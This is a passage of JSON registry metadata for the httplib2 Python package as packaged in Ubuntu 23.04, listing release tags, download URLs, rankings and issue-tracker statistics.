ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:48:21.228Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/python-httplib2?arch=source\u0026distro=ubuntu-23.04\u0026repository_url=https://launchpad.net/ubuntu/lunar","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/python-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/python-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/python-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/python-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/python-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-23.04/packages/python-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/